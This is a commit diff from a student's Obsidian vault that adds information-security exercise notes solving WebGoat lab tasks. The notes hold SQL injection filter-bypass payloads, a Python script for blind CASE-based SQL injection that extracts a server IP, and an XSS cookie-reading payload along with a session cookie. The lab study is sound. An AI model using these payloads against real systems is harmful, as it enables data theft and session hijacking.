Jordi/obsidian
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

vault backup: 2023-04-17 15:30:20

Browse Source
This commit is contained in:
Gentleman-DE
2023-04-17 15:30:20 +02:00
parent c7375ce49b
commit f81f042b9b
2 changed files with 123 additions and 79 deletions
Download Patch File Download Diff File Expand all files Collapse all files

146
.obsidian/workspace.json vendored
View File

@@ -1,15 +1,15 @@
{
"main": {
"id": "1345ce316d57bf13",
"id": "985a28639027cb68",
"type": "split",
"children": [
{
"id": "08ad9b53ade42d31",
"id": "70d3e404042bb7e1",
"type": "tabs",
"dimension": 62.59025270758123,
"dimension": 58.991008991009,
"children": [
{
"id": "e2194e3299515374",
"id": "8d74a64b5bdd799c",
"type": "leaf",
"state": {
"type": "markdown",
@@ -23,12 +23,12 @@
]
},
{
"id": "47553fa673bb1eb6",
"id": "09960489beb8807f",
"type": "tabs",
"dimension": 37.40974729241877,
"dimension": 41.008991008991,
"children": [
{
"id": "20668ba691cd80b3",
"id": "9acdf2a1e42ed9ec",
"type": "leaf",
"state": {
"type": "pdf",
@@ -43,25 +43,15 @@
"direction": "vertical"
},
"left": {
"id": "e5fbdfc2085faa4b",
"id": "cddcefee340fb8a5",
"type": "split",
"children": [
{
"id": "e02674fc64edf0b5",
"id": "94d495814220bf82",
"type": "tabs",
"children": [
{
"id": "b8336cb3c3d06be9",
"type": "leaf",
"state": {
"type": "file-explorer",
"state": {
"sortOrder": "alphabetical"
}
}
},
{
"id": "14611a26bf336471",
"id": "70ca5d990fce7a86",
"type": "leaf",
"state": {
"type": "search",
@@ -76,29 +66,40 @@
}
},
{
"id": "344d14435301d3da",
"id": "d5e695bcc8cab13d",
"type": "leaf",
"state": {
"type": "starred",
"state": {}
}
},
{
"id": "e66cc33cf17c042a",
"type": "leaf",
"state": {
"type": "file-explorer",
"state": {
"sortOrder": "alphabetical"
}
}
}
]
],
"currentTab": 2
}
],
"direction": "horizontal",
"width": 300
"width": 200
},
"right": {
"id": "70ae06261ef3fc74",
"id": "4540e984d4c131f5",
"type": "split",
"children": [
{
"id": "07672eb406645795",
"id": "b1ae273364c01df7",
"type": "tabs",
"children": [
{
"id": "827e4aecb1891b44",
"id": "3c5c1738be747670",
"type": "leaf",
"state": {
"type": "backlink",
@@ -115,7 +116,7 @@
}
},
{
"id": "583573a993e5af09",
"id": "a0e89b3fceee7653",
"type": "leaf",
"state": {
"type": "outgoing-link",
@@ -127,7 +128,7 @@
}
},
{
"id": "fbf143571343fb20",
"id": "a8d05e2876a81d16",
"type": "leaf",
"state": {
"type": "tag",
@@ -138,7 +139,7 @@
}
},
{
"id": "457947aad2c5e591",
"id": "858dd4c3359fda1d",
"type": "leaf",
"state": {
"type": "outline",
@@ -148,15 +149,7 @@
}
},
{
"id": "631d374a04a792db",
"type": "leaf",
"state": {
"type": "advanced-tables-toolbar",
"state": {}
}
},
{
"id": "b3aa4e2b20626da4",
"id": "4965238a34ee95eb",
"type": "leaf",
"state": {
"type": "calendar",
@@ -164,7 +157,7 @@
}
},
{
"id": "c3c39c68e6060e3e",
"id": "838787be957ae435",
"type": "leaf",
"state": {
"type": "juggl_nodes",
@@ -172,15 +165,14 @@
}
},
{
"id": "ccdfcdb588345764",
"id": "974f4434812d0416",
"type": "leaf",
"state": {
"type": "juggl_style",
"state": {}
}
}
],
"currentTab": 4
]
}
],
"direction": "horizontal",
@@ -196,52 +188,48 @@
"templates:Insert template": false,
"command-palette:Open command palette": false,
"table-editor-obsidian:Advanced Tables Toolbar": false,
"obsidian-livesync:Replicate": false,
"obsidian-livesync:Show log": false,
"obsidian-advanced-slides:Show Slide Preview": false,
"juggl:Juggl global graph": false
"juggl:Juggl global graph": false,
"obsidian-livesync:Replicate": false,
"obsidian-livesync:Show log": false
}
},
"active": "e2194e3299515374",
"active": "8d74a64b5bdd799c",
"lastOpenFiles": [
"Informationssicherheit/Ueb2/2023-04-17_14-16.png",
"Informationssicherheit/Ueb2/02-ueb_uebungsblatt.pdf",
"Informationssicherheit/Ueb2/Ueb2.md",
"Informationssicherheit/Ueb2/2023-04-17_14-16.png",
"Untitled 1.md",
"Untitled.md",
"Excalidraw/Drawing 2023-04-17 08.21.36.excalidraw.md",
"Excalidraw/Drawing 2023-04-17 08.21.00.excalidraw.md",
"Excalidraw",
"FH/Informationssicherheit/Ueb2/Ueb2.md",
"README.md",
"FH/Informationssicherheit/Ueb2/test.md",
"Informationssicherheit/Ueb2/test2.md",
"Informationssicherheit/Ueb2/Untitled.md",
"Informationssicherheit/Ueb1/01-ueb_uebungsblatt.pdf",
"Informationssicherheit/Ueb1/20230330_19h30m31s_grim.png",
"Informationssicherheit/Ueb1/20230330_19h34m13s_grim.png",
"Informationssicherheit/Ueb1/20230331_07h21m13s_grim.png",
"Informationssicherheit/Ueb1/20230331_10h28m24s_grim.png",
"Informationssicherheit/Ueb1/20230331_10h28m43s_grim.png",
"Informationssicherheit/Ueb1/20230331_14h12m43s_grim.png",
"Informationssicherheit/Ueb1/20230331_16h17m48s_grim.png",
"Informationssicherheit/Ueb1/20230331_16h21m51s_grim.png",
"Informationssicherheit/Ueb1/20230331_16h22m19s_grim.png",
"Informationssicherheit/Ueb1/Ueb01.md",
"Informationssicherheit/Ueb1/Ueb01.pdf",
"Informationssicherheit/VL/01-orga-motivation-handout.pdf",
"Informationssicherheit/VL/02-terminologie-handout.pdf",
"Informationssicherheit/VL/03-fm-orga-handout.pdf",
"CCN/VL01.md",
"Algorithmen und Datenstrukturen/UEB01.md",
"2023-04-16.md",
"Informationssicherheit/Ueb1",
"Informationssicherheit/VL",
"CCN",
"FH/2023-04-16.md",
"FH/Informationssicherheit/Ueb1/Ueb01.md",
"FH/Informationssicherheit/Ueb01.md",
"Informationssicherheit/Ueb2/test2.md",
"FH/Informationssicherheit/Ueb2/test.md",
"FH/Informationssicherheit/Ueb2/Untitled.md",
"FH/Informationssicherheit/Ueb1/20230330_19h30m31s_grim.png",
"FH/Informationssicherheit/Ueb1/20230330_19h34m13s_grim.png",
"FH/Algorithmen und Datenstrukturen/UEB01.md",
"FH/CCN/VL01.md"
"FH/Algorithmen und Datenstrukturen",
"FH/Informationssicherheit/Ueb1/20230331_07h21m13s_grim.png",
"FH/Informationssicherheit/Ueb1/20230331_10h28m24s_grim.png",
"FH/Informationssicherheit/Ueb1/20230331_10h28m43s_grim.png",
"FH/Informationssicherheit/Ueb1/20230331_14h12m43s_grim.png",
"FH/Informationssicherheit/Ueb1/20230331_16h17m48s_grim.png",
"FH/Informationssicherheit/Ueb1/20230331_16h21m51s_grim.png",
"FH/Informationssicherheit/Ueb1/20230331_16h22m19s_grim.png",
"FH/Informationssicherheit/Ueb1/20230331_16h29m50s_grim.png",
"FH/Informationssicherheit/Ueb1/Ueb01.pdf",
"FH/CCN/VL01.md",
"FH/CCN",
"FH/Informationssicherheit/Ueb1/Ueb01.md",
"FH/Informationssicherheit/VL/01-orga-motivation-handout.pdf",
"FH/Informationssicherheit/VL/02-terminologie-handout.pdf",
"FH/Informationssicherheit/Ueb1/01-ueb_uebungsblatt.pdf",
"FH/Informationssicherheit/Ueb2/02-ueb_uebungsblatt.pdf",
"FH/Informationssicherheit/VL/03-fm-orga-handout.pdf",
"FH/2023-04-16.md",
"FH/Informationssicherheit/Ueb2/Ueb2.md",
"Informationssicherheit/Ueb1/Ueb01.md",
"Algorithmen und Datenstrukturen/UEB01.md",
"CCN/VL01.md"
]
}

56
Informationssicherheit/Ueb2/Ueb2.md
View File

@@ -219,3 +219,59 @@ a';/**/select/**/*/**/from/**/user_system_data;--
```
### 4
```
a';/**/seselectlect/**/*/**/frfromom/**/user_system_data;--
```
### 5
```python
import json
import requests
def sql_injection_mitigation_10():
index = 0
headers = {
'Cookie': 'JSESSIONID=8f8OmDA8QEB8JwmEJtPbWkvVtAM_2AerEHJoWYFT'
}
while True:
payload = '(CASE WHEN (SELECT ip FROM servers WHERE hostname=\'webgoat-prd\') LIKE \'{}.%\' THEN id ELSE hostname END)'.format(index)
r = requests.get('http://127.0.0.1:8080/WebGoat/SqlInjectionMitigations/servers?column=' + payload, headers=headers)
try:
response = json.loads(r.text)
except:
print("Wrong JSESSIONID, find it by looking at your requests once logged in.")
return
if response[0]['id'] == '1':
print('webgoat-prd IP: {}.130.219.202'.format(index))
return
else:
index += 1
if index > 255:
print("No IP found")
return
sql_injection_mitigation_10()
```
Output:
```
webgoat-prd IP: 104.130.219.202
```
## Aufgaben
### a
# 2.3
## Cross Site Scripting
### 1
alert(document.cookie)
- JSESSIONID=WAoLCuHqYVKBPATEYnT23tGJaJPRHR9xRbDfnd2C
### 2